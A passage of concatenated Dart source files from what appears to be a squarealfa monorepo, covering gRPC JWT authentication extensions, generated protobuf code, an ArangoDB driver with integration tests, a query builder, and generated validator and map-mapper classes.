static void _addClaimIfNotNullOrEmpty(
Map<String, dynamic> claimsMap,
String claim,
String? value,
) {
if (value != null && value.isNotEmpty) claimsMap[claim] = value;
}
}
<|start_filename|>grpc_host/example/demo_service.pbgrpc.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: demo_service.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:async' as $async;
import 'dart:core' as $core;
import 'package:grpc/service_api.dart' as $grpc;
import 'demo_service.pb.dart' as $0;
export 'demo_service.pb.dart';
class GDemoServiceClient extends $grpc.Client {
static final _$insertPerson =
$grpc.ClientMethod<$0.GPerson, $0.GPersonInsertResult>(
'/GDemoService/InsertPerson',
($0.GPerson value) => value.writeToBuffer(),
($core.List<$core.int> value) =>
$0.GPersonInsertResult.fromBuffer(value));
GDemoServiceClient($grpc.ClientChannel channel,
{$grpc.CallOptions? options,
$core.Iterable<$grpc.ClientInterceptor>? interceptors})
: super(channel, options: options, interceptors: interceptors);
$grpc.ResponseFuture<$0.GPersonInsertResult> insertPerson($0.GPerson request,
{$grpc.CallOptions? options}) {
return $createUnaryCall(_$insertPerson, request, options: options);
}
}
abstract class GDemoServiceBase extends $grpc.Service {
$core.String get $name => 'GDemoService';
GDemoServiceBase() {
$addMethod($grpc.ServiceMethod<$0.GPerson, $0.GPersonInsertResult>(
'InsertPerson',
insertPerson_Pre,
false,
false,
($core.List<$core.int> value) => $0.GPerson.fromBuffer(value),
($0.GPersonInsertResult value) => value.writeToBuffer()));
}
$async.Future<$0.GPersonInsertResult> insertPerson_Pre(
$grpc.ServiceCall call, $async.Future<$0.GPerson> request) async {
return insertPerson(call, await request);
}
$async.Future<$0.GPersonInsertResult> insertPerson(
$grpc.ServiceCall call, $0.GPerson request);
}
<|start_filename|>grpc_host/lib/src/security/authentication_extensions.dart<|end_filename|>
import 'dart:async';
import 'package:grpc/grpc.dart';
import 'package:grpc_host/grpc_host.dart';
import 'package:squarealfa_security/squarealfa_security.dart';
import 'principal.dart';
part 'service_call_extra.dart';
extension AuthenticationExtensions on ServiceCall {
static final Expando _storage = Expando();
Principal get principal {
return _extra.principal ?? Principal.unauthenticated();
}
JwtPayload? get jwtPayload => _extra.jwtPayload;
_ServiceCallExtra get _extra {
var ret = _storage[this] ??= _ServiceCallExtra();
return ret as _ServiceCallExtra;
}
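  /// Authenticates the call from the bearer token in the `authorization`
  /// metadata header: the token payload is resolved via [getTokenPayload],
  /// checked for verification, e-mail verification and expiry, and the
  /// [Principal] produced by [createPrincipal] is attached to the call.
  /// When the header is absent the call is left unauthenticated; when
  /// validation fails a [GrpcError.unauthenticated] is thrown.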
Future authenticate({
required Future<JwtPayload> Function(String token) getTokenPayload,
required Future<Principal> Function(JwtPayload payload) createPrincipal,
}) async {
Principal? localPrincipal;
try {
final authHeader = clientMetadata?['authorization'];
if (authHeader == null) {
_extra.jwtPayload = null;
_extra.principal = null;
return;
}
final idToken = authHeader.startsWith('Bearer ')
? authHeader.substring(7)
: throw 'Invalid auth header';
var payload = await getTokenPayload(idToken);
if (!payload.isVerified) throw 'Unverified token';
if (!payload.emailVerified) throw 'Email is not verified';
if (payload.expires.difference(DateTime.now()).isNegative) {
throw 'Expired token';
}
_extra.jwtPayload = payload;
localPrincipal = await createPrincipal(payload);
} catch (e) {
throw GrpcError.unauthenticated();
} finally {
_extra.principal = localPrincipal;
}
return;
}
}
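/// Guard for service calls that require an authenticated caller:
/// throws [GrpcError.unauthenticated] when the call has no
/// authenticated [Principal].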
void authenticateCalls(ServiceCall context) {
var principal = context.principal;
if (!principal.isAuthenticated) {
throw GrpcError.unauthenticated();
}
}
<|start_filename|>arango_driver/lib/src/results/create_database_info.dart<|end_filename|>
import 'database_user.dart';
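/// Describes a database to be created, together with its initial [DatabaseUser]s.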
class CreateDatabaseInfo {
final String name;
final List<DatabaseUser> databaseUsers;
const CreateDatabaseInfo(
this.name, [
this.databaseUsers = const [],
]);
}
<|start_filename|>map_mapper/map_mapper_generator/lib/map_mapper_generator.dart<|end_filename|>
/// Generates code that maps (converts) instances of business
/// classes to Map<String, dynamic> and back.
library map_mapper_generator;
import 'package:build/build.dart';
import 'package:source_gen/source_gen.dart';
import 'src/map_map_generator.dart';
Builder mapMapBuilder(BuilderOptions options) =>
SharedPartBuilder([MapMapGenerator(options)], 'map_map');
<|start_filename|>grpc_host/example/demo_service.pbjson.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: demo_service.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields,deprecated_member_use_from_same_package
import 'dart:core' as $core;
import 'dart:convert' as $convert;
import 'dart:typed_data' as $typed_data;
@$core.Deprecated('Use gPersonDescriptor instead')
const GPerson$json = {
'1': 'GPerson',
'2': [
{'1': 'key', '3': 1, '4': 1, '5': 9, '10': 'key'},
{'1': 'name', '3': 2, '4': 1, '5': 9, '10': 'name'},
],
};
/// Descriptor for `GPerson`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gPersonDescriptor = $convert.base64Decode(
'<KEY>');
@$core.Deprecated('Use gPersonInsertResultDescriptor instead')
const GPersonInsertResult$json = {
'1': 'GPersonInsertResult',
'2': [
{'1': 'key', '3': 1, '4': 1, '5': 9, '10': 'key'},
],
};
/// Descriptor for `GPersonInsertResult`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gPersonInsertResultDescriptor = $convert
.base64Decode('<KEY>');
<|start_filename|>firebase-auth-admin/lib/src/firebase_token.dart<|end_filename|>
class FirebaseToken {
final int authTime;
final String issuer;
final String audience;
final int expires;
final int issuedAt;
final String subject;
final String uid;
final FirebaseInfo firebaseInfo;
FirebaseToken({
required this.authTime,
required this.issuer,
required this.audience,
required this.expires,
required this.issuedAt,
required this.subject,
required this.uid,
required this.firebaseInfo,
});
}
class FirebaseInfo {
final String signInProvider;
final String tenant;
final Map<String, dynamic> identities;
FirebaseInfo({
required this.signInProvider,
required this.tenant,
required this.identities,
});
}
<|start_filename|>arango_driver/test/arango_driver_test.dart<|end_filename|>
import 'package:arango_driver/arango_driver.dart';
import 'package:test/test.dart';
import 'test_conf.dart';
void main() {
group('Client can:', () {
final sch = dbscheme;
final h = dbhost;
final p = dbport;
const systemDb = '_system';
const testDb = 'test_temp_db';
const testCollection = 'test_temp_collection';
late String testDocumentKey;
    late String testDocumentRev;
var testMultipleDocumentsKeys = <String>[];
final u = dbuser;
final ps = dbpass;
const realm = '';
var clientSystemDb = ArangoDBClient(
scheme: sch,
host: h,
port: p,
db: systemDb,
user: u,
pass: ps,
realm: realm);
test('Get current db info', () async {
var answer = await clientSystemDb.currentDatabase();
if (answer.result.error) {
print(answer);
}
expect(answer.response!.name, equals(systemDb));
expect(answer.response!.isSystem, equals(true));
});
test('List of accessible databases', () async {
var answer = await clientSystemDb.userDatabases();
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, equals(false));
expect(answer.response, contains(systemDb));
});
test('List of all existing databases', () async {
var answer = await clientSystemDb.existingDatabases();
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, equals(false));
expect(answer.response, contains(systemDb));
});
test('Create a database', () async {
// first, ask about all databases
var databases = await clientSystemDb.existingDatabases();
// skip test if test database already exists
if (databases.response!.contains(testDb)) {
print(
// ignore: lines_longer_than_80_chars
'Skip test for creating database because database $testDb already exists.');
return;
}
// creating the test database
var result = await clientSystemDb.createDatabase(
CreateDatabaseInfo(testDb, [DatabaseUser('u', 'ps')]));
expect(result.result.error, equals(false));
expect(result.response, equals(true));
});
// changing current database
var testDbClient = ArangoDBClient(
scheme: sch,
host: h,
port: p,
db: testDb,
user: u,
pass: ps,
realm: realm);
test('create collection', () async {
var allCollectionsAnsw = await testDbClient.allCollections();
var alreadyExists = allCollectionsAnsw.response!
.any((coll) => coll.name == testCollection);
if (alreadyExists) {
        print('Skip creating collection $testCollection because it already exists');
} else {
var answer = await testDbClient
.createCollection(CollectionCriteria(testCollection));
if (answer.result.error == true) {
print(answer);
}
expect(answer.result.error, false);
expect(answer.collectionInfo.name, testCollection);
}
});
test('truncate collection', () async {
var answer = await testDbClient.truncateCollection(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
expect(answer.collectionInfo.name, testCollection);
});
test('get collection info', () async {
var answer = await testDbClient.collectionInfo(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
expect(answer.collectionInfo.name, testCollection);
});
test('get collection properties', () async {
var answer = await testDbClient.collectionProperties(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('get count of documents in collection', () async {
var answer = await testDbClient.documentsCount(testCollection);
if (answer.result.error == true) {
print(answer);
}
expect(answer.result.error, false);
});
test('get statistics for a collection', () async {
var answer = await testDbClient.collectionStatistics(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('get collection revision id', () async {
var answer = await testDbClient.collectionRevisionId(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('get collection checksum', () async {
var answer = await testDbClient.collectionChecksum(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('get all collections', () async {
var answer = await testDbClient.allCollections();
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
test('create document', () async {
var answer =
await testDbClient.createDocument(testCollection, {'Hello': 'World'});
if (answer.result.error) {
print(answer);
}
// save document key for next test:
testDocumentKey = answer.identifier.key;
});
test('getDocumentByKey returns Map with _key', () async {
var answer =
await testDbClient.getDocumentByKey(testCollection, testDocumentKey);
if (answer.result.error) {
print(answer);
}
expect(answer.document, contains('_key'));
});
test('getDocumentByKey can require document revision', () async {
// first get the doc:
var answer =
await testDbClient.getDocumentByKey(testCollection, testDocumentKey);
// get its revision:
expect(answer.document, contains('_rev'));
if (answer.result.error) {
print(answer);
}
// save its revision:
testDocumentRev = answer.document['_rev'] as String;
      // now try to get the document with a non-matching revision:
var emptyAnswer = await testDbClient.getDocumentByKey(
testCollection, testDocumentKey,
ifNoneMatchRevision: testDocumentRev);
      // because the last revision equals ${testDocumentRev},
      // the server answer will be empty:
expect(emptyAnswer.document, equals({}));
      // get the document only if it has the required revision:
var answerWithRevision = await testDbClient.getDocumentByKey(
testCollection, testDocumentKey,
ifMatchRevision: testDocumentRev);
expect(answerWithRevision.document, contains('_rev'));
if (answerWithRevision.result.error) {
print(answerWithRevision);
}
expect(answerWithRevision.document['_rev'], equals(testDocumentRev));
      // try to get the doc with a nonexistent revision:
var notExistAnswer = await testDbClient.getDocumentByKey(
testCollection, testDocumentKey,
ifMatchRevision: 'my_wrong_rev');
      // we will get an error response:
expect(notExistAnswer.result.error, equals(true));
expect(notExistAnswer.result.code, equals(412));
});
test('update document', () async {
// update document with returnNew:
var updateAnswer = await testDbClient.updateDocument(
testCollection, testDocumentKey, {'Hello': 'University'},
queryParams: {'returnNew': 'true'});
if (updateAnswer.map['new']['Hello'] != 'University') print(updateAnswer);
expect(updateAnswer.map['new']['Hello'], 'University');
// save revision:
testDocumentRev = updateAnswer.map['_rev'] as String;
var matchedUpdateAnswer = await testDbClient.updateDocument(
testCollection, testDocumentKey, {'Hello': 'Underground'},
ifMatchRevision: testDocumentRev);
// document was updated:
expect(matchedUpdateAnswer.oldRev, equals(testDocumentRev));
      // try to update with a non-matching revision:
var notMatchedUpdateAnswer = await testDbClient.updateDocument(
testCollection,
testDocumentKey,
{'Bad trying': 'because bad revision'},
ifMatchRevision: 'my_bad_rev');
      // we will get an error in the answer:
expect(notMatchedUpdateAnswer.result.error, equals(true));
expect(notMatchedUpdateAnswer.result.code, equals(412));
});
test('replace document', () async {
// replace document with returnNew:
var replaceAnswer = await testDbClient.replaceDocument(
testCollection, testDocumentKey, {'Goodby': 'Moon'},
queryParams: {'returnNew': 'true'});
if (replaceAnswer.map['new']['Goodby'] != 'Moon') print(replaceAnswer);
expect(replaceAnswer.map['new']['Goodby'], 'Moon');
// save revision:
testDocumentRev = replaceAnswer.map['_rev'] as String;
var matchedReplaceAnswer = await testDbClient.replaceDocument(
          testCollection, testDocumentKey, {'Hello': 'Underground'},
ifMatchRevision: testDocumentRev);
// document was updated:
expect(matchedReplaceAnswer.oldRev, equals(testDocumentRev));
      // try to update with a non-matching revision:
var notMatchedReplaceAnswer = await testDbClient.replaceDocument(
testCollection,
testDocumentKey,
{'Bad trying': 'because bad revision'},
ifMatchRevision: 'my_bad_rev');
      // we will get an error in the answer:
expect(notMatchedReplaceAnswer.result.error, equals(true));
expect(notMatchedReplaceAnswer.result.code, equals(412));
});
test('replace multiple documents', () async {
var replaceAnswer = await testDbClient.replaceDocuments(testCollection, [
{'_key': testDocumentKey, 'Good evening': 'Jupiter'}
], queryParams: {
'returnNew': 'true'
});
if (replaceAnswer[0].map['new']['_key'] != testDocumentKey) {
print(replaceAnswer);
}
expect(replaceAnswer[0].map['new']['_key'], testDocumentKey);
});
test('remove document', () async {
var answer = await testDbClient.removeDocument(
testCollection, testDocumentKey,
queryParams: {'returnOld': 'true'});
if (answer.result.error) {
print(answer);
}
expect(answer.map,
allOf(contains('_id'), contains('_key'), contains('_rev')));
if (!answer.map.containsKey('old')) print(answer);
if (answer.map['old']['Good evening'] != 'Jupiter') print(answer);
expect(answer.map['old']['Good evening'], 'Jupiter');
      // After this test, the document with `testDocumentKey` should be deleted.
});
test('create multiple documents', () async {
var answer = await testDbClient.createDocuments(testCollection, [
{'Hello': 'Earth'},
{'Hello': 'Venus'}
]);
      // 2 documents were inserted:
expect((answer).length, equals(2));
// about first document:
expect(answer[0].map,
allOf(contains('_id'), contains('_key'), contains('_rev')));
// save documents keys for later tests:
for (var doc in answer) {
testMultipleDocumentsKeys.add(doc.identifier.key);
}
});
test('remove multiple documents', () async {
var answer = await testDbClient.removeDocuments(testCollection, [
        // data should contain a list of maps with _key or _id attributes
        // for each document to remove
{
'_key': testMultipleDocumentsKeys[0],
},
{
'_key': testMultipleDocumentsKeys[1],
},
]);
// print('----------> ${answer}');
expect((answer).length, equals(2));
      // the first removed document has the same key as in the request body:
expect((answer)[0].map['_key'], equals(testMultipleDocumentsKeys[0]));
});
test('create and abort transaction', () async {
var answer = await testDbClient.beginTransaction(TransactionOptions());
if (answer.result.error) {
print(answer);
}
final abortAnswer =
await testDbClient.abortTransaction(answer.transaction);
expect(answer.transaction.id, isNotEmpty);
expect(answer.transaction.state, TransactionStates.running);
expect(abortAnswer.transaction.state, TransactionStates.aborted);
});
test('create and commit transaction', () async {
var answer = await testDbClient.beginTransaction(TransactionOptions());
if (answer.result.error) {
print(answer);
}
final commitAnswer =
await testDbClient.commitTransaction(answer.transaction);
expect(answer.transaction.id, isNotEmpty);
expect(answer.transaction.state, TransactionStates.running);
expect(commitAnswer.transaction.state, TransactionStates.committed);
});
test('create document and rollback', () async {
final countResult = await testDbClient.documentsCount(testCollection);
final count = countResult.collectionInfo.count ?? 0;
var answer = await testDbClient.beginTransaction(TransactionOptions(
writeCollections: [testCollection],
waitForSync: true,
allowImplicit: true,
));
if (answer.result.error) {
print(answer);
}
final transaction = answer.transaction;
await testDbClient.createDocument(
testCollection,
{'Hello': 'World TRX'},
transaction: transaction,
);
final beforeCount = (await testDbClient.documentsCount(
testCollection,
transaction: transaction,
))
.collectionInfo
.count ??
0;
final extraCount = (await testDbClient.documentsCount(
testCollection,
))
.collectionInfo
.count ??
0;
await testDbClient.abortTransaction(transaction);
final abortCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
expect(beforeCount, count + 1);
expect(extraCount, count);
expect(abortCount, count);
});
test('create document and commit', () async {
final countResult = await testDbClient.documentsCount(testCollection);
final count = countResult.collectionInfo.count ?? 0;
var answer = await testDbClient.beginTransaction(TransactionOptions(
writeCollections: [testCollection],
waitForSync: true,
allowImplicit: true,
));
if (answer.result.error) {
print(answer);
}
final transaction = answer.transaction;
await testDbClient.createDocument(
testCollection,
{'Hello': 'World TRX'},
transaction: transaction,
);
final preCommitCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
final trxCount = (await testDbClient.documentsCount(
testCollection,
transaction: transaction,
))
.collectionInfo
.count ??
0;
final results = await testDbClient.queryToList(
{
          // See also client.queryToStream().
'query': '''
FOR doc IN test_temp_collection
RETURN doc
''',
},
transaction: transaction,
);
final resultCount = results.length;
await testDbClient.commitTransaction(transaction);
final commitCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
expect(commitCount, count + 1);
expect(trxCount, count + 1);
expect(resultCount, count + 1);
expect(preCommitCount, count);
});
test('delete document and abort', () async {
final doc = await testDbClient.createDocument(
testCollection,
{'Hello': 'World For Delete and Abort'},
);
final key = doc.identifier.key;
final countResult = await testDbClient.documentsCount(testCollection);
final count = countResult.collectionInfo.count ?? 0;
var answer = await testDbClient.beginTransaction(TransactionOptions(
writeCollections: [testCollection],
waitForSync: true,
allowImplicit: true,
));
if (answer.result.error) {
print(answer);
}
final transaction = answer.transaction;
var result = await testDbClient.removeDocument(
testCollection,
key,
transaction: transaction,
);
if (result.result.error) {
print(result.result.errorMessage);
}
await testDbClient.abortTransaction(transaction);
final afterCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
expect(afterCount, count);
});
test('delete document and commit', () async {
final doc = await testDbClient.createDocument(
testCollection,
{'Hello': 'World For Delete and Commit'},
);
final key = doc.identifier.key;
final countResult = await testDbClient.documentsCount(testCollection);
final count = countResult.collectionInfo.count ?? 0;
var answer = await testDbClient.beginTransaction(TransactionOptions(
writeCollections: [testCollection],
waitForSync: true,
allowImplicit: true,
));
if (answer.result.error) {
print(answer);
}
final transaction = answer.transaction;
var result = await testDbClient.removeDocument(
testCollection,
key,
transaction: transaction,
);
print(result);
await testDbClient.commitTransaction(transaction);
final afterCount = (await testDbClient.documentsCount(testCollection))
.collectionInfo
.count ??
0;
expect(afterCount, count - 1);
});
var testDbClientWithConnectionString = ArangoDBClient(
scheme: sch,
host: h,
port: p,
db: testDb,
user: u,
pass: ps,
realm: realm);
test('get collection info from connection created with connectionstring',
() async {
var answer =
await testDbClientWithConnectionString.collectionInfo(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
expect(answer.collectionInfo.name, testCollection);
});
test('drop collection', () async {
var answer = await testDbClient.dropCollection(testCollection);
if (answer.result.error) {
print(answer);
}
expect(answer.result.error, false);
});
// back to _system db
test('drop test database', () async {
var answer = await clientSystemDb.dropDatabase(testDb);
if (answer.result.error) {
print(answer);
}
expect(answer.response, equals(true));
});
});
}
<|start_filename|>arango_driver/lib/src/query.dart<|end_filename|>
import 'query/bind_name_value_pair.dart';
import 'query/query_text_fragment.dart';
/// Builds a query as an object from readable fragments,
/// with support for conditional lines and bind variables.
/// A Query object does not call the database by itself.
/// It can be converted to a [Map] via the toMap() method
/// and passed as an argument to the `query()` method
/// of the database client.
/// For debugging, a Query object can be printed as a [String],
/// because it overrides toString().
/// Sample:
/// ```
/// var query = Query(
/// [
/// Line('LET tag=@tag'),
/// Line('FOR doc in docs'),
/// LineIfThen(
/// tag != null, 'FILTER doc.tags && POSITION(doc.tags, tag )'),
/// Line('SORT doc.datetime'),
/// LineIfThenElse(
/// without_content, 'return UNSET(doc,"content")', 'return doc'),
/// ],
/// bindVars: [BindVarIfThen(tag != null, 'tag', tag)],
/// ).toMap();
/// ```
class Query {
// initial structures are set in constructors:
List<QueryTextFragment> fragments = [];
List<BindNameValuePair> bindVars = [];
// The compiled result from all bindVars:
Map<String, dynamic> bindVarsMap = {};
  /// Returns the bound variables of the query object.
Map<String, dynamic> get bindedVars => bindVarsMap;
Query(this.fragments, {this.bindVars = const []});
  /// Named constructor equivalent to Query().
  Query.create(List<QueryTextFragment> fragments,
      {List<BindNameValuePair> bindVars = const []})
      : this(fragments, bindVars: bindVars);
/// Returns query string from [Query] object.
String queryString() => fragments
.map((f) => f.toString())
.where((f) => f.isNotEmpty)
.toList()
.cast<String>()
.join('\n');
  /// Returns the created query object as a [Map] structure
  /// containing the keys `'query'` and `'bindVars'`.
  /// The `'query'` value holds the query text,
  /// the result of the `queryString()` method.
  /// The `'bindVars'` value holds the bound variables,
  /// the result of the `bindedVars` getter.
Map<String, Object> toMap() {
//let's collect bindVars into a Map:
for (var bv in bindVars) {
bindVarsMap.addAll(bv.bindNameValuePair);
}
var result = {
'query': queryString(),
'bindVars': bindedVars,
};
return result;
}
  /// Human-readable view of the Query object.
/// See `toMap()` method to get created query object as Map structure.
@override
String toString() => toMap().toString();
}
<|start_filename|>entity/test/lib/src/ingredient.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'ingredient.dart';
// **************************************************************************
// ValidatorGenerator
// **************************************************************************
class $IngredientValidator implements Validator {
const $IngredientValidator();
ValidationError? validateDescription(String value, {Ingredient? entity}) {
if (value.length < 10) {
return StringLengthValidationError(
'description',
length: value.length,
minLength: 10,
maxLength: null,
);
}
return null;
}
ValidationError? validateNotes(String? value, {Ingredient? entity}) {
if (value != null && value.length > 10) {
return StringLengthValidationError(
'notes',
length: value.length,
minLength: null,
maxLength: 10,
);
}
return null;
}
ValidationError? validateTag(String? value, {Ingredient? entity}) {
if (value != null && value.length < 2) {
return StringLengthValidationError(
'tag',
length: value.length,
minLength: 2,
maxLength: null,
);
}
return null;
}
ValidationError? validateQuantity(double value, {Ingredient? entity}) {
if (value < 10.0) {
return RangeValidationError('quantity',
value: value, minValue: 10.0, maxValue: 20);
}
if (value > 20) {
return RangeValidationError('quantity',
value: value, minValue: 10.0, maxValue: 20);
}
return null;
}
ValidationError? validatePrecision(Decimal value, {Ingredient? entity}) {
if (value < Decimal.fromInt(10)) {
return RangeValidationError('precision',
value: value, minValue: Decimal.fromInt(10), maxValue: null);
}
return null;
}
ValidationError? validateIntQuantity(int value, {Ingredient? entity}) {
if (value < 10) {
return RangeValidationError('intQuantity',
value: value, minValue: 10, maxValue: 20);
}
if (value > 20) {
return RangeValidationError('intQuantity',
value: value, minValue: 10, maxValue: 20);
}
return null;
}
ValidationError? validateNintQuantity(int? value, {Ingredient? entity}) {
if (value != null && value < 10) {
return RangeValidationError('nintQuantity',
value: value, minValue: 10, maxValue: 20);
}
if (value != null && value > 20) {
return RangeValidationError('nintQuantity',
value: value, minValue: 10, maxValue: 20);
}
return null;
}
ValidationError? validateRInt(int? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('rInt');
}
if (value < 10) {
return RangeValidationError('rInt',
value: value, minValue: 10, maxValue: 20);
}
if (value > 20) {
return RangeValidationError('rInt',
value: value, minValue: 10, maxValue: 20);
}
return null;
}
ValidationError? $validateDescription(String? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('description');
}
return validateDescription(value, entity: entity);
}
ValidationError? $validateQuantity(double? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('quantity');
}
return validateQuantity(value, entity: entity);
}
ValidationError? $validatePrecision(Decimal? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('precision');
}
return validatePrecision(value, entity: entity);
}
ValidationError? $validateIntQuantity(int? value, {Ingredient? entity}) {
if (value == null) {
return RequiredValidationError('intQuantity');
}
return validateIntQuantity(value, entity: entity);
}
@override
ErrorList validate(covariant Ingredient entity) {
var errors = <ValidationError>[];
ValidationError? error;
if ((error = validateDescription(entity.description, entity: entity)) !=
null) {
errors.add(error!);
}
if ((error = validateNotes(entity.notes, entity: entity)) != null) {
errors.add(error!);
}
if ((error = validateTag(entity.tag, entity: entity)) != null) {
errors.add(error!);
}
if ((error = validateQuantity(entity.quantity, entity: entity)) != null) {
errors.add(error!);
}
if ((error = validatePrecision(entity.precision, entity: entity)) != null) {
errors.add(error!);
}
if ((error = validateIntQuantity(entity.intQuantity, entity: entity)) !=
null) {
errors.add(error!);
}
if ((error = validateNintQuantity(entity.nintQuantity, entity: entity)) !=
null) {
errors.add(error!);
}
if ((error = validateRInt(entity.rInt, entity: entity)) != null) {
errors.add(error!);
}
return ErrorList(errors);
}
@override
void validateThrowing(covariant Ingredient entity) {
var errors = validate(entity);
if (errors.validationErrors.isNotEmpty) throw errors;
}
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_admin_exception.dart<|end_filename|>
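/// Exception type used by the firebase-auth-admin package to report errors,
/// carrying a descriptive [message].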
class FirebaseAdminException implements Exception {
final String message;
FirebaseAdminException(this.message);
}
<|start_filename|>defaults_provider/test/lib/src/recipe.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe.dart';
// **************************************************************************
// DefaultsProviderGenerator
// **************************************************************************
abstract class $RecipeDefaultsProviderBase {
const $RecipeDefaultsProviderBase();
Recipe createWithDefaults({
String? key,
String? title,
List<Ingredient>? ingredients,
int? numPosts,
double? doubleNumPosts,
Decimal? decimalNumPosts,
Ingredient? mainIngredient,
Category? category,
}) {
return Recipe(
key: key ?? this.key,
title: title ?? this.title,
ingredients: ingredients ?? this.ingredients,
numPosts: numPosts ?? this.numPosts,
doubleNumPosts: doubleNumPosts ?? this.doubleNumPosts,
decimalNumPosts: decimalNumPosts ?? this.decimalNumPosts,
mainIngredient: mainIngredient ?? this.mainIngredient,
category: category ?? this.category,
);
}
String get key => '';
String get title => '';
List<Ingredient> get ingredients => const [];
int get numPosts => 0;
double get doubleNumPosts => 0;
Decimal get decimalNumPosts => Decimal.zero;
Ingredient get mainIngredient =>
$IngredientDefaultsProvider().createWithDefaults();
Category get category;
}
<|start_filename|>proto_mapper/test/lib/grpc/key.pbjson.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: key.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields,deprecated_member_use_from_same_package
import 'dart:core' as $core;
import 'dart:convert' as $convert;
import 'dart:typed_data' as $typed_data;
@$core.Deprecated('Use gKeyDescriptor instead')
const GKey$json = {
'1': 'GKey',
'2': [
{'1': 'key', '3': 1, '4': 1, '5': 9, '10': 'key'},
],
};
/// Descriptor for `GKey`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gKeyDescriptor =
$convert.base64Decode('CgRHS2V5EhAKA2tleRgBIAEoCVIDa2V5');
@$core.Deprecated('Use gListOfKeyDescriptor instead')
const GListOfKey$json = {
'1': 'GListOfKey',
'2': [
{'1': 'items', '3': 1, '4': 3, '5': 11, '6': '.GKey', '10': 'items'},
],
};
/// Descriptor for `GListOfKey`. Decode as a `google.protobuf.DescriptorProto`.
final $typed_data.Uint8List gListOfKeyDescriptor = $convert
.base64Decode('CgpHTGlzdE9mS2V5EhsKBWl0ZW1zGAEgAygLMgUuR0tleVIFaXRlbXM=');
<|start_filename|>grpc_host/lib/src/hosting/host_parameters.dart<|end_filename|>
import 'dart:isolate';
import 'package:grpc_host/grpc_host.dart';
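/// Values handed to a service host isolate: the [SendPort] used to report
/// back to the spawning isolate and the application [Settings].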
class HostParameters<TAppSettings> {
final SendPort sendPort;
final Settings settings;
const HostParameters(
this.sendPort,
this.settings,
);
}
<|start_filename|>map_mapper/test_mongo/lib/src/recipe.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe.dart';
// **************************************************************************
// MapMapGenerator
// **************************************************************************
class $RecipeMapMapper extends MapMapper<Recipe> {
const $RecipeMapMapper();
@override
Recipe fromMap(Map<String, dynamic> map) {
final $kh = const MongoKeyHandler();
return Recipe(
key: $kh.keyFromMap(map, 'key'),
title: map['title'] as String,
description: map['description'] as String?,
categoryKey: $kh.keyFromMap(map, 'categoryKey'),
secondaryCategoryKey: map['secondaryCategoryKey'] == null
? null
: $kh.keyFromMap(map, 'secondaryCategoryKey'),
category: const $CategoryMapMapper().fromMap(map['category']),
ingredients: List<Ingredient>.unmodifiable(map['ingredients']
.map((e) => const $IngredientMapMapper().fromMap(e))),
publishDate: DateTime.parse(map['publishDate']),
expiryDate:
map['expiryDate'] == null ? null : DateTime.parse(map['expiryDate']),
preparationDuration: Duration(milliseconds: map['preparationDuration']),
totalDuration: map['totalDuration'] == null
? null
: Duration(milliseconds: map['totalDuration']),
isPublished: map['isPublished'] as bool,
requiresRobot: map['requiresRobot'] as bool?,
mainApplianceType: ApplianceType.values[map['mainApplianceType'] as int],
secondaryApplianceType: map['secondaryApplianceType'] == null
? null
: ApplianceType.values[map['secondaryApplianceType'] as int],
tags: List<String>.unmodifiable(map['tags']),
extraTags: map['extraTags'] == null
? null
: List<String>.unmodifiable(map['extraTags']),
);
}
@override
Map<String, dynamic> toMap(Recipe instance) {
final $kh = const MongoKeyHandler();
final map = <String, dynamic>{};
$kh.keyToMap(map, instance.key, 'key');
map['title'] = instance.title;
map['description'] = instance.description;
$kh.keyToMap(map, instance.categoryKey, 'categoryKey');
$kh.keyToMap(
map, instance.secondaryCategoryKey ?? '', 'secondaryCategoryKey');
map['category'] = const $CategoryMapMapper().toMap(instance.category);
map['ingredients'] = instance.ingredients
.map((e) => const $IngredientMapMapper().toMap(e))
.toList();
map['publishDate'] = instance.publishDate.toIso8601String();
map['expiryDate'] = instance.expiryDate?.toIso8601String();
map['preparationDuration'] = instance.preparationDuration.inMilliseconds;
map['totalDuration'] = instance.totalDuration?.inMilliseconds;
map['isPublished'] = instance.isPublished;
map['requiresRobot'] = instance.requiresRobot;
map['mainApplianceType'] = instance.mainApplianceType.index;
